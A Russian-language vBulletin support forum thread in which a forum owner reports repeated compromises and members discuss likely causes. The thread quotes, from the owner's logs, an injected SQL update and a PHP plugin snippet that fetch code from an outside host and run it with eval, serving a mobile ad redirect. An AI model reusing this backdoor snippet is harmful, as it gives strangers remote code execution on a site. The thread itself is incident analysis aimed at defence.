форум vBSupport.ru > vBSupport.ru > Безопасность
Register Меню vBsupport Изображения Files Manager О рекламе Today's Posts Search
  • Родная гавань
  • Блок РКН снят
  • Premoderation
  • For English speaking users
  • Каталог Фрилансеров
  • If you want to buy some product or script
  • Администраторам
VBsupport перешел с домена .ORG на родной .RU Ура! Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей

Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
for English speaking users:
You may be surprised with restriction of access to the attachments of the forum. The reason is the recent change in vbsupport.org strategy:

- users with reputation < 10 belong to "simple_users" users' group
- if your reputation > 10 then administrator (kerk, Luvilla) can decide to move you into an "improved" group, but only manually

Main idea is to increase motivation of community members to share their ideas and willingness to support to each other. You may write an article for the subject where you are good enough, you may answer questions, you may share vbulletin.com/org content with vbsupport.org users, receiving "thanks" equal your reputation points. We should not only consume, we should produce something.

- you may:
* increase your reputation (doing something useful for another members of community) and being improved
* purchase temporary access to the improved category:
10 $ for 3 months. - this group can download attachments, reputation/posts do not matter.
20 $ for 3 months. - this group can download attachments, reputation/posts do not matter + adds eliminated + Inbox capacity increased + files manager increased permissions.

Please contact kerk or Luvilla regarding payments.

Important!:
- if your reputation will become less then 0, you will be moved into "simple_users" users' group automatically.*
*for temporary groups (pre-paid for 3 months) reputation/posts do not matter.
Уважаемые пользователи!

На форуме открыт новый раздел "Каталог фрилансеров"

и отдельный раздел для платных заказов "Куплю/Закажу"

Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже:
Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота.
Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание

Андрюшкин
Знаток
vBSponsor

Андрюшкин's Avatar
Exclamation Взлом vbulletin разных версий
0

Добрый день, заметил что начали ломать воблу вшивая рекламный редирект скрипт.
Каким-то образом взоумышленнику удается выполнить SQL запрос, вот выдержка из логов

Code:
 Invalid SQL:
UPDATE plugin SET phpcode=concat(phpcode, "
$config_data = file_get_contents(\'http://images.imagenetcom.com/xml.php?a=inner&host=\' . $_SERVER[\'SERVER_NAME\']);\r\nif(strlen($config_data) > 0){ eval($config_data); }\n") WHERE pluginid=760;
т.е. человек дописывает либо в конец существующего либо создает новый модуль с кодом запроса рекламного скрипта.

на его сайте видно что взломано очень много форумов различных версий, в том числе и популярный http://clubvolvo.ru/forum.php

видно что код выполняется у них тоже.

Кто сталкивался уже, в чем суть дыры, я перелопатил кучу логов, пока безрезультатно.

п.с. никаких стремных модулей у меня не установлено, айпи с которого сработала ошибка якобы принадлежит поисковику bing.com
обновлять воблу не вариант, многое переписано уже, понятно что дело именно в вобле, так как в числе ломаных сайтов именно этот двиг
Bot
Yandex Bot Yandex Bot is online now

Реклама на форуме А что у нас тут интересного? =)

kerk
k0t

kerk's Avatar
0

дырявые хаки, которые не экранируют входящие данные в пост/гет запросах, могут послужить добавлением не большого куска кода в модуль
ну а далее дело техники, используя этот модуль, можно залить более "тяжелый" шелл, а дальше все и так понятно =)

kerk
k0t

kerk's Avatar
0

Quote:
Originally Posted by Андрюшкин View Post
вшивая рекламный редирект скрипт
а что это означает?
кто и как может что то "вшивать" не имея доступа ни к админке, ни к файлам сервера?

Андрюшкин
Знаток
vBSponsor

Андрюшкин's Avatar
0

Quote:
Originally Posted by kerk View Post
дырявые хаки, которые не экранируют входящие данные в пост/гет запросах, могут послужить добавлением не большого куска кода в модуль
ну а далее дело техники, используя этот модуль, можно залить более "тяжелый" шелл, а дальше все и так понятно =)
ну суть я понимаю как это делается, прочесал весь access.log на наличие странных запросов, пока ничего не обнаружил, ломали меня 2 раза, через разные скрипты (первый раз attachment.php второй showthread.php думаю суть не в них)

Андрюшкин добавил 17.10.2016 в 17:17
Quote:
а что это означает?
кто и как может что то "вшивать" не имея доступа ни к админке, ни к файлам сервера?
вот такая строчка добавляется в существующий модель или в новый

Code:
$config_data = file_get_contents('http://images.imagenetcom.com/xml.php?a=inner&host=' . $_SERVER['SERVER_NAME']);
if(strlen($config_data) > 0){ eval($config_data); }
это обычный рекламный мобильный редирект, работу кода можно увидеть только зайдя на форум с мобильного

Last edited by Андрюшкин : 10-17-2016 at 06:17 PM. Reason: Добавлено сообщение

Catlord Meow
Специалист

Catlord Meow's Avatar
0

Quote:
обновлять воблу не вариант, многое переписано уже
Перестаньте есть кактус
Со времён 4.2.2 вышло несколько обновлений, затрагивающих, в частности, уязвимости форума.
Поставьте 4.2.3 PL2 и обновляйте по мере появления релизов.
Quote:
первый раз attachment.php
http://vbsupport.ru/forum/showthread.php?t=52472
Quote:
никаких стремных модулей у меня не установлено
А какие установлены?
Вы пробовали их все отключить, и посмотреть на результаты?

Или, как вариант, сервер взломан через другую уязвимость.
Другая CMS, например.

Андрюшкин
Знаток
vBSponsor

Андрюшкин's Avatar
0

Quote:
Originally Posted by Catlord Meow View Post
Перестаньте есть кактус
Со времён 4.2.2 вышло несколько обновлений, затрагивающих, в частности, уязвимости форума.
у меня стоит 3.6.4 обновление движка невозможно, от оригинальной воблы там мало что осталось
Quote:
http://vbsupport.ru/forum/showthread.php?t=52472
тему видел, скорее всего это не мой случай. у меня разрешены к загруpке только 2 типа файлов mp3 и wav
да и судя из логов, запрос был выполнен неавторизированным юзером, а загружать атачи такие не могут

Quote:
А какие установлены?
кроме vbplaza и закрепление первого поста на всех страницах никаких + несколько написанных персонально, но дело не в них, так как ломают форумы и без этих плагинов, значит проблема не в плагинах. дыра либо в версии php либо основательно в движке воблы.

Quote:
Другая CMS, например.
также исключено, ничего больше не используется.

посмотрите здесь какие сайты были взломаны список сайтов
на всех вобла разных версий

kerk
k0t

kerk's Avatar
0

Quote:
Перестаньте есть кактус
Со времён 4.2.2 вышло несколько обновлений
вот как раз узеры четверки и продолжают жевать кактус =)

kerk
k0t

kerk's Avatar
0

а, да...
записи в логах, не говорят о том, что был взлом
но была попытка взлома

Андрюшкин
Знаток
vBSponsor

Андрюшкин's Avatar
0

kerk, вы случайно не помните кто владелец clubvolvo.ru ? он точно есть здесь на форуме, я его почему-то помню, но не помню ник. смотрю он вроде бы пофиксил дыру

по вашим логам не видно как пытались взломать? можно в личку мне, у меня логи стокилометровые, уже глаза лезут искать в них странные запросы((

Catlord Meow
Специалист

Catlord Meow's Avatar
1

Quote:
вот как раз узеры четверки и продолжают жевать кактус =)
Ну речь всё же не про мажорную версию, а про то, что форум не обновлён до последней стабильной версии.
Quote:
кто владелец clubvolvo.ru ?
http://vbsupport.ru/forum/member.php?u=46210

Но не сказать, что они уже полностью пофиксили проблему...
http://clubvolvo.ru/showthread.php?t...27#post3610627

Tags
уязвимость

Posting Rules